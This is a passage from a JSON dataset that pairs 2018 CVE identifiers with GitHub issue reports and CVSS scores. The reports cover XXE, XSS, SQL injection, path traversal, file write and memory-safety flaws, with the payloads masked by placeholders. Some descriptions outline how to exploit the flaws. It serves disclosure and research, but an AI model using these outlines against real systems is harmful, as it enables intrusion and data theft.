  16986. "description": "XXE Security Vulnerability within XML File Parsing Function. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The line of code given below create an XML parser for parsing an XML file opened and parses the data within: URLTAG This parsing is done in an insecure manner and does not prohibit the usage of XML external entities. This allows attackers to do the above mentioned attacks on a targeted user. Attack Scenario An attacker can simply give a APITAG user an XML file (or maybe the user downloads the file off an untrusted website). The user then opens the file in the browser and triggers the XML parser, cause the vulnerability to be triggered. APITAG File APITAG",
  16987. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16988. "severity": "HIGH",
  16989. "baseScore": 7.8,
  16990. "impactScore": 5.9,
  16991. "exploitabilityScore": 1.8
  16992. },
  16993. {
  16994. "CVE_ID": "CVE-2018-1000542",
  16995. "Issue_Url_old": "https://github.com/raydac/netbeans-mmd-plugin/issues/45",
  16996. "Issue_Url_new": "https://github.com/raydac/netbeans-mmd-plugin/issues/45",
  16997. "Repo_new": "raydac/netbeans-mmd-plugin",
  16998. "Issue_Created_At": "2018-05-29T14:10:54Z",
  16999. "description": "XXE in file import. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occured The parser parses mind map files (which is XML) without proper protections within the parsing function. URLTAG The parsing module is called from the function below: URLTAG A specially crafted mind map file can exploit this XXE issue.",
  17000. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  17001. "severity": "HIGH",
  17002. "baseScore": 7.8,
  17003. "impactScore": 5.9,
  17004. "exploitabilityScore": 1.8
  17005. },
  17006. {
  17007. "CVE_ID": "CVE-2018-1000543",
  17008. "Issue_Url_old": "https://github.com/rockiger/akiee/issues/42",
  17009. "Issue_Url_new": "https://github.com/rockiger/akiee/issues/42",
  17010. "Repo_new": "rockiger/akiee",
  17011. "Issue_Created_At": "2018-05-17T23:09:11Z",
  17012. "description": "FILETAG FILETAG Expected behavior This cross site scripting vulnerability allows an attacker to execute arbitrary code on the victims machine by tricking his victim into opening a crafted FILETAG that looks like this ERRORTAG In the worst case this will lead to a reverse shell. I am not going to paste the code for the reverse shell here for obvious reasons.",
  17013. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17014. "severity": "MEDIUM",
  17015. "baseScore": 6.1,
  17016. "impactScore": 2.7,
  17017. "exploitabilityScore": 2.8
  17018. },
  17019. {
  17020. "CVE_ID": "CVE-2018-1000544",
  17021. "Issue_Url_old": "https://github.com/rubyzip/rubyzip/issues/369",
  17022. "Issue_Url_new": "https://github.com/rubyzip/rubyzip/issues/369",
  17023. "Repo_new": "rubyzip/rubyzip",
  17024. "Issue_Created_At": "2018-06-14T18:41:06Z",
  17025. "description": "Several directory traversal vulnerabilities. Overview This issue is similar to already closed URLTAG but I found two ways to bypass that fix. You can find files for tests in URLTAG Proof of concept: rubyzip.rb CODETAG NUMBERTAG Files with absolute path APITAG strips absolute path ERRORTAG rubyzip extracts files with absolute path CODETAG NUMBERTAG Archive with symbolic link APITAG extracts only symbolic link ERRORTAG rubyzip extracts symbolic link and puts file into APITAG folder CODETAG Vulnerable version and test environment ERRORTAG ERRORTAG",
  17026. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17027. "severity": "CRITICAL",
  17028. "baseScore": 9.8,
  17029. "impactScore": 5.9,
  17030. "exploitabilityScore": 3.9
  17031. },
  17032. {
  17033. "CVE_ID": "CVE-2018-1000546",
  17034. "Issue_Url_old": "https://github.com/triplea-game/triplea/issues/3442",
  17035. "Issue_Url_new": "https://github.com/triplea-game/triplea/issues/3442",
  17036. "Repo_new": "triplea-game/triplea",
  17037. "Issue_Created_At": "2018-05-29T14:05:02Z",
  17038. "description": "XXE in Game Parser. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occured URLTAG The above code parses a game file. A sample game file can be found at: FILETAG To exploit this issue, import the following XML code: APITAG",
  17039. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  17040. "severity": "HIGH",
  17041. "baseScore": 7.8,
  17042. "impactScore": 5.9,
  17043. "exploitabilityScore": 1.8
  17044. },
  17045. {
  17046. "CVE_ID": "CVE-2018-1000559",
  17047. "Issue_Url_old": "https://github.com/qutebrowser/qutebrowser/issues/4011",
  17048. "Issue_Url_new": "https://github.com/qutebrowser/qutebrowser/issues/4011",
  17049. "Repo_new": "qutebrowser/qutebrowser",
  17050. "Issue_Created_At": "2018-06-21T16:07:19Z",
  17051. "description": "History page parses and renders html tags. While visiting this page URLTAG which has an html input element as it's title ( APITAG ), I noticed that it got parsed like HTML and actually displays the rendered element in the PATHTAG page, whereas expected/desired behavoir would be the website title being displayed in plain text. I then searched a bunch of unclosed html tags in google, a APITAG and an APITAG . The NUMBERTAG topmost items in this screenshot show that it all get's evaluated: FILETAG Version Information: URLTAG",
  17052. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17053. "severity": "MEDIUM",
  17054. "baseScore": 6.1,
  17055. "impactScore": 2.7,
  17056. "exploitabilityScore": 2.8
  17057. },
  17058. {
  17059. "CVE_ID": "CVE-2018-1000620",
  17060. "Issue_Url_old": "https://github.com/hapijs/cryptiles/issues/34",
  17061. "Issue_Url_new": "https://github.com/hapijs/cryptiles/issues/34",
  17062. "Repo_new": "hapijs/cryptiles",
  17063. "Issue_Created_At": "2018-06-24T04:05:37Z",
  17064. "description": "APITAG generates biased random digits. Reported by Microsoft Vulnerability Research: MSVR NUMBERTAG The APITAG method generates digits that lack a perfect distribution over enough attempts.",
  17065. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17066. "severity": "CRITICAL",
  17067. "baseScore": 9.8,
  17068. "impactScore": 5.9,
  17069. "exploitabilityScore": 3.9
  17070. },
  17071. {
  17072. "CVE_ID": "CVE-2018-1000636",
  17073. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2435",
  17074. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2435",
  17075. "Repo_new": "jerryscript-project/jerryscript",
  17076. "Issue_Created_At": "2018-07-24T09:16:56Z",
  17077. "description": "Null pointer dereference in jmem heap. Jerry Version: f NUMBERTAG d NUMBERTAG Build command: APITAG OS: Ubuntu NUMBERTAG Test case: APITAG Result: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bc1 bp NUMBERTAG sp NUMBERTAG fff3cb1ba NUMBERTAG T NUMBERTAG bc0 in jmem_heap_free_block PATHTAG NUMBERTAG PATHTAG NUMBERTAG in ecma_builtin_dispatch_routine PATHTAG NUMBERTAG in ecma_builtin_dispatch_call PATHTAG NUMBERTAG in ecma_op_function_call PATHTAG NUMBERTAG f5 in opfunc_call PATHTAG NUMBERTAG f5 in vm_execute PATHTAG NUMBERTAG fda in vm_run PATHTAG NUMBERTAG in vm_run_eval PATHTAG NUMBERTAG in ecma_op_eval_chars_buffer PATHTAG NUMBERTAG f in jerry_eval PATHTAG NUMBERTAG f in main jerry main/main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG jmem_heap_free_block NUMBERTAG ABORTING Immediate cause: It seems that this bug is caused by triggering undefined behavior at PATHTAG The second passed argument is NULL. This causes NULL dereference and allows GCC to optimize out subsequent checks for NULL. This further causes writing to null pointer, which results in a segmentation fault. Note, that because this bug occurs due to gcc optimizing out a check for NULL, this may not be reproducible with a debug build. Please confirm if you can reproduce this issue. This bug was discovered by Marcin Dominiak and Wojciech Rauner.",
  17078. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  17079. "severity": "MEDIUM",
  17080. "baseScore": 6.5,
  17081. "impactScore": 3.6,
  17082. "exploitabilityScore": 2.8
  17083. },
  17084. {
  17085. "CVE_ID": "CVE-2018-1000638",
  17086. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/20",
  17087. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/20",
  17088. "Repo_new": "bg5sbk/minicms",
  17089. "Issue_Created_At": "2018-08-03T10:10:25Z",
  17090. "description": "APITAG reflective XSS in PATHTAG This is a reflective XSS vulnerability poc : GET PATHTAG NUMBERTAG E NUMBERTAG Ca NUMBERTAG E HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Cookie: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Cache Control: max age NUMBERTAG reason : FILETAG result : FILETAG",
  17091. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17092. "severity": "MEDIUM",
  17093. "baseScore": 6.1,
  17094. "impactScore": 2.7,
  17095. "exploitabilityScore": 2.8
  17096. },
  17097. {
  17098. "CVE_ID": "CVE-2018-1000639",
  17099. "Issue_Url_old": "https://github.com/arnobl/latexdraw/issues/10",
  17100. "Issue_Url_new": "https://github.com/latexdraw/latexdraw/issues/10",
  17101. "Repo_new": "latexdraw/latexdraw",
  17102. "Issue_Created_At": "2018-07-18T13:07:14Z",
  17103. "description": "XXE in SVG Parsing. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occured The following code snippet sets an SVG Entity resolver and parses the SVG file retrieved from the URL: URLTAG To exploit this issue, create an SVG file with the following code: APITAG",
  17104. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  17105. "severity": "CRITICAL",
  17106. "baseScore": 9.6,
  17107. "impactScore": 6.0,
  17108. "exploitabilityScore": 2.8
  17109. },
  17110. {
  17111. "CVE_ID": "CVE-2018-1000640",
  17112. "Issue_Url_old": "https://github.com/villagedefrance/OpenCart-Overclocked/issues/190",
  17113. "Issue_Url_new": "https://github.com/villagedefrance/opencart-overclocked/issues/190",
  17114. "Repo_new": "villagedefrance/opencart-overclocked",
  17115. "Issue_Created_At": "2018-07-18T13:19:30Z",
  17116. "description": "Reflected XSS in APITAG Template. The Issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim's browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Where the Issue Occured The following code shows that the APITAG variable is reflected to the victim's browser without any input validation, leading to reflected XSS: URLTAG An example payload for the token variable is given below: APITAG",
  17117. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17118. "severity": "MEDIUM",
  17119. "baseScore": 6.1,
  17120. "impactScore": 2.7,
  17121. "exploitabilityScore": 2.8
  17122. },
  17123. {
  17124. "CVE_ID": "CVE-2018-1000641",
  17125. "Issue_Url_old": "https://github.com/YesWiki/yeswiki/issues/356",
  17126. "Issue_Url_new": "https://github.com/yeswiki/yeswiki/issues/356",
  17127. "Repo_new": "yeswiki/yeswiki",
  17128. "Issue_Created_At": "2018-07-19T09:39:08Z",
  17129. "description": "PHP Objection Injection. The Issue PHP Object Deserialization Injection attacks utilise the unserialize function within PHP. The deserialisation of the PHP object can trigger certain methods within the object, allowing the attacker to perform unauthorised actions like execution of code, disclosure of information, etc. Where the Issue Occurred Displayed below is the code within the APITAG project containing the vulnerable code: URLTAG",
  17130. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17131. "severity": "CRITICAL",
  17132. "baseScore": 9.8,
  17133. "impactScore": 5.9,
  17134. "exploitabilityScore": 3.9
  17135. },
  17136. {
  17137. "CVE_ID": "CVE-2018-1000642",
  17138. "Issue_Url_old": "https://github.com/Ysurac/FlightAirMap/issues/410",
  17139. "Issue_Url_new": "https://github.com/ysurac/flightairmap/issues/410",
  17140. "Repo_new": "ysurac/flightairmap",
  17141. "Issue_Created_At": "2018-07-19T09:49:30Z",
  17142. "description": "Reflected XSS in FILETAG . The Issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim's browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Where the Issue Occurred The following code shows that the APITAG variable is reflected to the victim's browser without any input validation, leading to reflected XSS: URLTAG An example payload for the registration variable is given below: ERRORTAG",
  17143. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17144. "severity": "MEDIUM",
  17145. "baseScore": 6.1,
  17146. "impactScore": 2.7,
  17147. "exploitabilityScore": 2.8
  17148. },
  17149. {
  17150. "CVE_ID": "CVE-2018-1000644",
  17151. "Issue_Url_old": "https://github.com/eclipse/rdf4j/issues/1056",
  17152. "Issue_Url_new": "https://github.com/eclipse/rdf4j/issues/1056",
  17153. "Repo_new": "eclipse/rdf4j",
  17154. "Issue_Created_At": "2018-07-19T11:45:15Z",
  17155. "description": "XXE in XML Parser. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without disabling entities: URLTAG URLTAG",
  17156. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17157. "severity": "CRITICAL",
  17158. "baseScore": 10.0,
  17159. "impactScore": 6.0,
  17160. "exploitabilityScore": 3.9
  17161. },
  17162. {
  17163. "CVE_ID": "CVE-2018-1000645",
  17164. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1210",
  17165. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1210",
  17166. "Repo_new": "librehealthio/lh-ehr",
  17167. "Issue_Created_At": "2018-07-23T11:35:05Z",
  17168. "description": "Authenticated Local File Disclosure in FILETAG . The Issue Local file disclosure is a vulnerability which allows an attacker to disclose the contents of files on the server. An attacker can use this vulnerability to disclose the contents of sensitive files like APITAG , config files, etc. In lh ehr, an attacker must be authenticated to perform this attack. Should the attacker know the path to a file and the web server user has sufficient access to read the file, the contents of the file will be echoed in the page. Where the Issue Occurred The following code snippet displays the usage of the APITAG function in PHP within the lh ehr application: URLTAG",
  17169. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  17170. "severity": "MEDIUM",
  17171. "baseScore": 6.5,
  17172. "impactScore": 3.6,
  17173. "exploitabilityScore": 2.8
  17174. },
  17175. {
  17176. "CVE_ID": "CVE-2018-1000646",
  17177. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1211",
  17178. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1211",
  17179. "Repo_new": "librehealthio/lh-ehr",
  17180. "Issue_Created_At": "2018-07-23T11:42:50Z",
  17181. "description": "Authenticated Unrestricted File Write in FILETAG . The Issue Unrestricted file write vulnerabilities allow attackers to write file such as PHP files, in locations where the web server user has access to write. This may allow an attacker to write files with malicious content and may lead to remote code execution Where the Issue Occurred The following code snippet displays the usage of the APITAG function in PHP within the lh ehr application: URLTAG",
  17182. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17183. "severity": "HIGH",
  17184. "baseScore": 8.8,
  17185. "impactScore": 5.9,
  17186. "exploitabilityScore": 2.8
  17187. },
  17188. {
  17189. "CVE_ID": "CVE-2018-1000647",
  17190. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1212",
  17191. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1212",
  17192. "Repo_new": "librehealthio/lh-ehr",
  17193. "Issue_Created_At": "2018-07-23T11:49:10Z",
  17194. "description": "Authenticated Unrestricted File Deletion . The Issue Unrestricted file deletion vulnerabilities are caused by overly trusting a user's input and allowing the user to manipulate the path of the file to be deleted. This may allow an attacker to create a denial of service scenario. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet displays the usage of the ERRORTAG function in PHP within the lh ehr application: URLTAG",
  17195. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
  17196. "severity": "HIGH",
  17197. "baseScore": 7.1,
  17198. "impactScore": 4.2,
  17199. "exploitabilityScore": 2.8
  17200. },
  17201. {
  17202. "CVE_ID": "CVE-2018-1000648",
  17203. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1213",
  17204. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1213",
  17205. "Repo_new": "librehealthio/lh-ehr",
  17206. "Issue_Created_At": "2018-07-23T11:57:29Z",
  17207. "description": "Authenticated Unrestricted File Write in FILETAG . The Issue Unrestricted file write vulnerabilities allow attackers to write file such as PHP files, in locations where the web server user has access to write. This may allow an attacker to write files with malicious content and may lead to remote code execution. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet displaya the usage of the fopen function in PHP within the lh ehr application: URLTAG This creates or overwrites a file that the web server user has access to. The following code snippet displays writing user controlled content within the user controlled file: URLTAG",
  17208. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17209. "severity": "HIGH",
  17210. "baseScore": 8.8,
  17211. "impactScore": 5.9,
  17212. "exploitabilityScore": 2.8
  17213. },
  17214. {
  17215. "CVE_ID": "CVE-2018-1000649",
  17216. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1214",
  17217. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1214",
  17218. "Repo_new": "librehealthio/lh-ehr",
  17219. "Issue_Created_At": "2018-07-23T12:10:18Z",
  17220. "description": "Authenticated Unrestricted File Write in FILETAG NUMBERTAG The Issue Unrestricted file write vulnerabilities allow attackers to write file such as PHP files, in locations where the web server user has access to write. This may allow an attacker to write files with malicious content and may lead to remote code execution. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet displays the usage of the fopen function in PHP within the lh ehr application: URLTAG This creates or overwrites a file that the web server user has access to. The following code snippet displays writing user controlled content within the user controlled file: URLTAG",
  17221. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17222. "severity": "HIGH",
  17223. "baseScore": 8.8,
  17224. "impactScore": 5.9,
  17225. "exploitabilityScore": 2.8
  17226. },
  17227. {
  17228. "CVE_ID": "CVE-2018-1000650",
  17229. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1215",
  17230. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1215",
  17231. "Repo_new": "librehealthio/lh-ehr",
  17232. "Issue_Created_At": "2018-07-23T12:22:06Z",
  17233. "description": "Authenticated SQL Injection in FILETAG . The Issue SQL Injections are vulnerabilities in which the developer overly trusts user controlled input. This allows an attacker to perform malicious queries upon the database, which can lead to compromise of all data within the database and question the integrity of the data. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet shows the SQL query being created with a tainted variable: URLTAG The following code snippet show the above mentioned SQL query being executed: URLTAG",
  17234. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17235. "severity": "HIGH",
  17236. "baseScore": 8.8,
  17237. "impactScore": 5.9,
  17238. "exploitabilityScore": 2.8
  17239. },
  17240. {
  17241. "CVE_ID": "CVE-2018-1000652",
  17242. "Issue_Url_old": "https://github.com/JabRef/jabref/issues/4229",
  17243. "Issue_Url_new": "https://github.com/jabref/jabref/issues/4229",
  17244. "Repo_new": "jabref/jabref",
  17245. "Issue_Created_At": "2018-07-23T12:31:45Z",
  17246. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippet displays the usage of APITAG without disabling entities: URLTAG The following code snippet displays the parsing of the XML: URLTAG",
  17247. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17248. "severity": "CRITICAL",
  17249. "baseScore": 10.0,
  17250. "impactScore": 6.0,
  17251. "exploitabilityScore": 3.9
  17252. },
  17253. {
  17254. "CVE_ID": "CVE-2018-1000657",
  17255. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/44800",
  17256. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/44800",
  17257. "Repo_new": "rust-lang/rust",
  17258. "Issue_Created_At": "2017-09-24T00:57:53Z",
  17259. "description": "seg fault pushing on either side of a APITAG I've been seeing lots of bad behavior trying to use APITAG I've boiled it down to a relatively simple example which shows some of the bad behavior I was seeing and additionally seg faults. This was with: rustc NUMBERTAG f3d NUMBERTAG f NUMBERTAG binary: rustc commit hash: APITAG commit date NUMBERTAG host NUMBERTAG apple darwin release NUMBERTAG LLVM version NUMBERTAG and also rust NUMBERTAG The output I expect to see is: > old packet NUMBERTAG pushing D NUMBERTAG FB A8 > new packet NUMBERTAG D NUMBERTAG FB A8 The output I get is: > old packet NUMBERTAG pushing D NUMBERTAG FB A8 > new packet NUMBERTAG FB A8 > Segmentation fault NUMBERTAG Note that the fourth from the last byte should be D9. Work around seems to be to use a large APITAG capacity. Here's the code: CODETAG",
  17260. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17261. "severity": "HIGH",
  17262. "baseScore": 7.8,
  17263. "impactScore": 5.9,
  17264. "exploitabilityScore": 1.8
  17265. },
  17266. {
  17267. "CVE_ID": "CVE-2018-1000660",
  17268. "Issue_Url_old": "https://github.com/tock/tock/issues/1147",
  17269. "Issue_Url_new": "https://github.com/tock/tock/issues/1147",
  17270. "Repo_new": "tock/tock",
  17271. "Issue_Created_At": "2018-08-07T18:27:40Z",
  17272. "description": "Package name can potentially access all flash and ram. I haven't written code that exploits the bug yet, so it is just a theoretical bug. Summary If you are using a TBF version NUMBERTAG there is no check on the length of the package name, so it could be as large as all the flash memory available. Since the package name is public, every capsule could have unrestricted read access to all memory, using only safe code. Exploiting the bug There are two ways of exploiting the bug: One could create a User process using a APITAG with an arbitrary large package name length, and later on a Capsule could use its package name to read arbitrary memory. Or, a capsule could call the safe function \"get_package_name\" with a raw pointer that points to a fake TBF version NUMBERTAG header and use it to read the data anywhere by using the package name offset and length. Code: Inside process.rs lines NUMBERTAG APITAG Now lines NUMBERTAG and NUMBERTAG inside the function create: APITAG And at last, inside the function APITAG ERRORTAG There are no checks for either pkg_name_offset nor pkg_name_size. Proposed solutions First the APITAG should probably be made unsafe, and then either some package name size check should be placed (either in the get package name function, or in the parse_and_validate_tbf_header function) or the support for NUMBERTAG header should be dropped.",
  17273. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  17274. "severity": "HIGH",
  17275. "baseScore": 7.5,
  17276. "impactScore": 3.6,
  17277. "exploitabilityScore": 3.9
  17278. },
  17279. {
  17280. "CVE_ID": "CVE-2018-1000666",
  17281. "Issue_Url_old": "https://github.com/0-complexity/openvcloud/issues/1207",
  17282. "Issue_Url_new": "https://github.com/0-complexity/openvcloud/issues/1207",
  17283. "Repo_new": "0-complexity/openvcloud",
  17284. "Issue_Created_At": "2018-01-16T19:45:44Z",
  17285. "description": "Some weird feature in portal make portal crash. Detailed description Try to figure out what procued undeneath stacktrace Steps to reproduce ? Relevant stacktraces CODETAG",
  17286. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17287. "severity": "CRITICAL",
  17288. "baseScore": 9.8,
  17289. "impactScore": 5.9,
  17290. "exploitabilityScore": 3.9
  17291. },
  17292. {
  17293. "CVE_ID": "CVE-2018-1000667",
  17294. "Issue_Url_old": "https://github.com/cyrillos/nasm/issues/3",
  17295. "Issue_Url_new": "https://github.com/cyrillos/nasm/issues/3",
  17296. "Repo_new": "cyrillos/nasm",
  17297. "Issue_Created_At": "2018-08-22T14:10:55Z",
  17298. "description": "crash found by fuzzing. I fuzzing the nasm using smart fuzzer, and find a crash of nasm. The crash info is as follow: ERRORTAG I debug the program, and the crash is caused by function assemble_file(inname, depend_ptr) at APITAG Please check it. The POC is in the attachment. FILETAG",
  17299. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  17300. "severity": "MEDIUM",
  17301. "baseScore": 5.5,
  17302. "impactScore": 3.6,
  17303. "exploitabilityScore": 1.8
  17304. },
  17305. {
  17306. "CVE_ID": "CVE-2018-1000671",
  17307. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/268",
  17308. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/268",
  17309. "Repo_new": "sympa-community/sympa",
  17310. "Issue_Created_At": "2018-04-16T08:00:42Z",
  17311. "description": "Possible XSS. The following link redirects to bing: URLTAG It also works in NUMBERTAG We have no newer sympa to test with. It seems to me maybe this is a bug in a perl dependency? I couldn't find \"referer\" directly in sympa's source code during a (very) cursory grep.",
  17312. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17313. "severity": "MEDIUM",
  17314. "baseScore": 6.1,
  17315. "impactScore": 2.7,
  17316. "exploitabilityScore": 2.8
  17317. },
  17318. {
  17319. "CVE_ID": "CVE-2018-1000800",
  17320. "Issue_Url_old": "https://github.com/zephyrproject-rtos/zephyr/issues/7638",
  17321. "Issue_Url_new": "https://github.com/zephyrproject-rtos/zephyr/issues/7638",
  17322. "Repo_new": "zephyrproject-rtos/zephyr",
  17323. "Issue_Created_At": "2018-05-17T20:10:19Z",
  17324. "description": "get FAULT when fuzzing sys_ring_buf_ put and sys_ring_bug_get APIs. I am trying to fuzzing the kernel APIs, and I wrote a simple application to call the APIs: sys_ring_buf_put and sys_ring_buf_get. the code is as below CODETAG when I run the application, it result in USEAGE FAULT as following: CODETAG Should zephyr add some checks like type and bound check in the implementation of syscall API code ?",
  17325. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17326. "severity": "CRITICAL",
  17327. "baseScore": 9.8,
  17328. "impactScore": 5.9,
  17329. "exploitabilityScore": 3.9
  17330. },
  17331. {
  17332. "CVE_ID": "CVE-2018-1000804",
  17333. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/594",
  17334. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/594",
  17335. "Repo_new": "contiki-ng/contiki-ng",
  17336. "Issue_Created_At": "2018-07-09T14:57:04Z",
  17337. "description": "Stack based buffer overflow while parsing AQL (parsing next token). Function next_token that provides next token during AQL parsing tries to memcpy input data (part of AQL files) into fixed size buffer. Allocated buffer can fit only DB_MAX_ELEMENT_SIZE NUMBERTAG bytes and the check is missing. Crash line: aql APITAG Declaration of buffer: APITAG typedef char value_t[DB_MAX_ELEMENT_SIZE]; APITAG define DB_MAX_ELEMENT_SIZE NUMBERTAG APITAG value_t value; aql APITAG NUMBERTAG int lexer_start(lexer_t lexer, char input, token_t token, value_t value) { lexer >input = input; lexer >prev_pos = input; lexer >token = token; lexer >value = value; Overflow: aql APITAG memcpy(lexer >value, s, length); This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG critical) Following AQL code will trigger crash APITAG APITAG Mitigation : The size of input token should be limited to DB_MAX_ELEMENT_SIZE. Please take a look at patch fixing this issue in APITAG (using antelope engine as arastorage): URLTAG Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc6d2ca NUMBERTAG at pc NUMBERTAG f1b NUMBERTAG c NUMBERTAG bp NUMBERTAG ffc6d2ca NUMBERTAG sp NUMBERTAG ffc6d2c9a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffc6d2ca NUMBERTAG thread T NUMBERTAG f1b NUMBERTAG c NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG c NUMBERTAG in next_token PATHTAG NUMBERTAG c NUMBERTAG in 